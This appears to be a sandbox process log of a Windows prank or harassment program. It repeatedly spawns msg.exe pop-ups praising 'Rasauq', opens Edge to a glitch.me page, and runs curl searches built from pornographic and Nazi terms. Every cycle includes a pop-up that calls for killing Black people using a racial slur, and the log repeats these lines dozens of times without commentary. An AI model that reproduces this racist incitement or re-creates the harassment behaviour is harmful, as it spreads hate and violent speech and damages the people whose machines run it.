msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --always-read-main-dll --field-trial-handle=8240,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=13116 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --always-read-main-dll --field-trial-handle=5728,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=12984 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --always-read-main-dll --field-trial-handle=13304,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=13332 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --always-read-main-dll --field-trial-handle=13484,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=13520 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=fallback-handler --database="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --exception-pointers=112115826672576 --process=264 /prefetch:7 --thread=5540
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2248,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=9036 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=7972,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=6744 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --always-read-main-dll --field-trial-handle=3956,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=8468 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --always-read-main-dll --field-trial-handle=13704,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=5680 /prefetch:2
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
